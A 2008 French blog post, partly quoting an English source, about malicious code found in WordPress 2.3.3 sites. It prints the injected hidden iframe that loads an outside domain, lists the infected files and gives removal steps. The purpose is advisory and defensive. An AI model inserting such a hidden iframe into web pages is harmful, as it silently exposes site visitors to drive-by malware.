Faille découverte sur WordPress 2.3.3

By | mars 8, 2008 at 08 03 08 | 5 comments | Non classé | Tags: , , ,

 Faille découverte sur Wordpress 2.3.3

Verne de Creative Breafing vient de découvrir la première faille sur la dernière version de WordPress (2.3.3)

It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins were causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.

Il nous explique que beaucoup de ses utilisateurs rencontraient des problèmes d’erreurs 404 ou de détections de virus lorsqu’ils consultaient son blog. Le problème viendrait selon lui de googlerank.info

Plus précisement cette ligne de code :

<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>

Voici la liste des fichiers concernés par le problème :

  • /wp-admin/admin-footer.php
  • /wp-admin/upload.php
  • /wp-content/themes/yourtheme/footer.php
  • /wp-includes/js/tinymce/blank.htm
  • /wp-includes/js/tinymce/license.htm
  • /wp-includes/js/tinymce/plugins/paste/blank.htm
  • /wp-includes/js/tinymce/plugins/paste/pastetext.htm
  • /wp-includes/js/tinymce/plugins/paste/pasteworld.htm
  • /wp-includes/js/tinymce/themes/advanced/about.htm
  • /wp-includes/js/tinymce/themes/advanced/anchor.htm
  • /wp-includes/js/tinymce/themes/advanced/charmap.htm
  • /wp-includes/js/tinymce/themes/advanced/color_picker.htm
  • /wp-includes/js/tinymce/themes/advanced/image.htm
  • /wp-includes/js/tinymce/themes/advanced/link.htm
  • /wp-includes/js/tinymce/themes/advanced/source_editor.htm

Une solution (temporaire) :

  1. Re-uploadez votre ficiher footer.php file dans le dossier de votre thème. Assurez vous d’avoir supprimer la ligne cité ci dessus au préalable
  2. Si vous utilisez l’editeur de thème via l’admin WordPress, éditez le ficiher footer.php (pied de page). Cherchez la ligne de code suivante puis supprimez là :<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
  3. Téléchargez la dernière version de WordPress ici
  4. Copiez les dossier /wp-admin/ et /wp-includes/ sur votre serveur en écrasant les fichiers antérieur, cela remettra en place votre version de WordPress.

La sortie de la version 2.5 de wordpress va t’elle faire son apparation plus tôt que prévu ?

Crédit photo/montage  : Business Garden 

Like it? Tweet it!

About the Author

5 Comments

  1. Wordpress 2.5 arrive participez à la traduction | Le Journal du Blog (3 years ago)

    [...] vous parlais dernièrement d’une faille dans la version 2.3.3 qui pourrait précipiter la sortie de la version 2.5 de WordPress. Cette [...]

  2. ronan / Business Garden (3 years ago)

    Tient, c’est amusant (mais assez décevant) de retrouver un montage que j’avais fait pour illustrer un de mes articles sans la moindre citation ou petit lien (blogroll ou autre) :)

    http://www.business-garden.com.....danger.png
    http://tinyurl.com/2ojxy9

  3. Romain (3 years ago)

    Effectivement Ronan, j’ai trouvé ça sur Google image sans faire attention à la source. Je rajoute un crédit de suite. Vraiment désolé, merci pour ton intervention.

  4. zorba (3 years ago)

    qsdazvfs5465z4vf65se4f654sf5
    f54s564bfsd54f5s
    sd86f4s68f4sd5

  5. Olen Thansamai (9 months ago)

    titanic post you’ve gain

Comments

© 2011 WideZine. All rights reserved.